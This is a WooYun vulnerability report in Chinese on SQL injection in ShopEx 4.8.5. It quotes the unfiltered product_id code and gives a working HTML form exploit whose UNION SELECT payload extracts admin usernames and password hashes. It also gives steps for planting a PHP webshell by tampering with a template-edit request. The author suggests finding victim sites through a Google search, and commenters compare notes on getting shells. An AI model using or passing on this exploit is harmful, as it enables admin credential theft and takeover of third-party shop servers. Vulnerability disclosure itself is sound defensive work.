当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08597

漏洞标题:SHOPEX 4.8.5 注入漏洞以及后台拿SHELL

相关厂商:ShopEx

漏洞作者: fyouckoff

提交时间:2012-06-21 17:47

修复时间:2012-08-05 17:47

公开时间:2012-08-05 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-21: 细节已通知厂商并且等待厂商处理中
2012-06-21: 厂商已经确认,细节仅向厂商公开
2012-06-24: 细节向第三方安全合作伙伴开放
2012-08-15: 细节向核心白帽子及相关领域专家公开
2012-08-25: 细节向普通白帽子公开
2012-09-04: 细节向实习白帽子公开
2012-08-05: 细节向公众公开

简要描述:

SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
shopex很久没有更新了啊亲,非得每次出漏洞了才更新一下下吗?
wooyun提示:漏洞在上报乌云之前已经在外界披露,请紧急处理

详细说明:

SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
漏洞文件:
漏洞核心函数 \core\model_v5\trading\mdl.goods.php
漏洞代码:

public function getProducts( $gid, $pid = 0 )
{
	$sqlWhere = "";
	if ( 0 < $pid )
	{
		$sqlWhere = " AND A.product_id = ".$pid; //www.lpboke.com 没过滤 ~~~~~~
	}
	$sql = "SELECT A.*,B.image_default FROM sdb_products AS A LEFT JOIN sdb_goods AS B ON A.goods_id=B.goods_id WHERE A.goods_id=".intval( $gid ).$sqlWhere;
	return $this->db->select( $sql );
}


\core\shop\controller\ctl.product.php 文件调用

function gnotify($goods_id=0,$product_id=0){
 
	if($_POST['goods']['goods_id']){
		$goods_id = $_POST['goods']['goods_id'];
		$product_id = $_POST['goods']['product_id'];
	}
		$this->id =$goods_id;
	$objGoods = &$this->system->loadModel('trading/goods');
	$aProduct = $objGoods->getProducts($goods_id, $product_id);//www.lpboke.com 直接带进去了
 
	$this->pagedata['goods'] = $aProduct[0];
	if($this->member[member_id]){
		$objMember = &$this->system->loadModel('member/member');
		$aMemInfo = $objMember->getFieldById($this->member[member_id], array('email'));
		$this->pagedata['member'] = $aMemInfo;
	}
 
	$this->output();
}


EXP: 保存为html使用即可

<html> 
<head> 
<title>Shopex 4.8.5 SQL Injection Exp</title> 
</head> 
<body> 
<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2> 
<form action="http://www.xxoo.com/?product-gnotify" method="post" name="submit_url"> 
    <input type="hidden" name="goods[goods_id]" value="3"> 
    <input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators"> 
    <input type="submit" value=""> 
</form>
 
网址请修改:http://www.xxoo.com/?product-gnotify <br />
本程序只能用于网站安全检测 <br />
禁止用于非法途径,产生的一切后果与作者无关!<br />
<body> 
</html>


拿shell方法….
第一步 页面管理 修改模版 然后选一个XML编辑
开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来
然后改包 包要这么改 我研究了半天 尼玛的菊花红
id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel
我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称
随便google下“powered by shopex v4.8.5”,找个站测试一下


另外测试了几个知名站点,也都中招,这里就不贴图了
跟随电商潮而来的另一波脱裤潮要来了。。。

漏洞证明:

修复方案:

找程序猿吧

版权声明:转载请注明来源 fyouckoff@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-06-21 21:51

厂商回复:

感谢您为信息安全做的贡献。
改漏洞已经过提交过或者已经公开处理过
非常感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2012-06-21 18:04 | beastk ( 实习白帽子 | Rank:50 漏洞数:11 | 一不小心高潮了)

    假设一种情景,某人挖洞保存很久,别人发布出来了,自己用得差不多了就报出来,还可以赚个原创,只是假设。

  2. 2012-06-21 18:46 | fyouckoff ( 路人 | Rank:6 漏洞数:3 | 这个家伙很穷,什么都没有留下)

    @beastk 你只猜对了一半。交流、进步也是wooyun存在的原因吧 @xsser 这里只能发原创的话,这个可以不给rank

  3. 2012-06-21 20:22 | 疯狂 ( 普通白帽子 | Rank:239 漏洞数:30 | 桃李春风一杯酒莲湖夜雨八年灯)

    幸好我回家早,不然我的小店。。。。。。。在我的小店上测试成功,操。。。。。。不知道有shell没

  4. 2012-06-21 20:39 | fyouckoff ( 路人 | Rank:6 漏洞数:3 | 这个家伙很穷,什么都没有留下)

    @疯狂 我的店也是...

  5. 2012-06-21 22:33 | 疯狂 ( 普通白帽子 | Rank:239 漏洞数:30 | 桃李春风一杯酒莲湖夜雨八年灯)

    但是get不了shell,我测试了半天,get不到shell

  6. 2012-06-22 08:57 | saga ( 路人 | Rank:11 漏洞数:2 | 世界上只有10种人,懂二进制的,和不懂二进...)

    @疯狂 后台可以修包拿哦

  7. 2012-06-22 14:41 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    shopex再不出洞都快被遗忘了

  8. 2012-06-23 11:44 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    http://www.lpboke.com/shopex-4-8-5-%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E4%BB%A5%E5%8F%8A%E5%90%8E%E5%8F%B0%E6%8B%BFshell.html - -被人公开了

  9. 2012-09-14 17:27 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

    @saga 求拿shell方法了。。我弄了半天 就像@fyouckoff 说的 尼玛 菊花红 还没拿到shell

  10. 2013-03-20 16:45 | 少校 ( 实习白帽子 | Rank:40 漏洞数:5 | 别开枪,自己人!)

    我去 才给1rank